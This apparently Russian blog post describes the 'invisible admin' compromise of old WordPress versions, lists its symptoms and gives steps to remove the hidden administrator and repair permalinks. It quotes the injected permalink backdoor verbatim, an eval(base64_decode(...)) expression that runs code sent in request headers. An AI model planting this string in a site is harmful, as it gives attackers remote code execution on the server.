Думать, что бессильный враг не может вредить, – это думать, что искра не может произвести пожара.
Саади
Черти лезут из всех щелей. Старые блоги на Wordpress до версии 2.8.3 подвержены атаке невидимого админа. Он проникает в блог, ломает ЧПУ и всяко портит воздух. Но рецепт спасения есть. Погибнут не все, а только каждый пятый, но и он оживет, если есть бэкап базы.
Симптомы болезни следующие:
- неправильные т.е. неработающие ЧПУ ссылки с лишними символами
- лишние пользователи с правами “Администратор” (могут быть невидимыми)
- ну и всякие побочные проблемы
Выглядят ЧПУ ссылки после заражения как-то так:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ или так "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Чтобы избавиться от этой лихой напасти, нужно удалить лишнего пользователя и пофиксить ссылки. Самое простое средство это удалить базу и резуректить из бэкапа. Если нет какого мощного антибиотика, то нужно обратиться к шаманам и сделать по шагам следующее:
- В админке в настройках ЧПУ удалить болезнетворный код.
- Найти в пользователях последнего зарегистрировавшегося админа.
- У этого пользователя правым кликом скопировать ссылку Редактирование/Edit и вставить его в адресную строку, увеличить номер на 1.
- Вы должны получить скрытого админа со странным кодом в поле Имя. Удалите код, чтобы понизить его статус до Подписчика, затем снова перейдите к Пользователям и удалите его.
Второй способ, если не вышло, это зайти в базу через PHPmyadmin, и убить там все ручками.
Профилактикой является обновление до последней версии движка, на данный момент 2.8.4. Затем остается ждать обновлений, которые будут полностью неуязвимы для невидимых админов. Бэкап это панацея кстати и желательно не хранить его на сервере, просто так, на всякий случай. Делается это при помощи плагина абсолютно автоматически.
По мотивам разных статей:
.
.
Оставить комментарий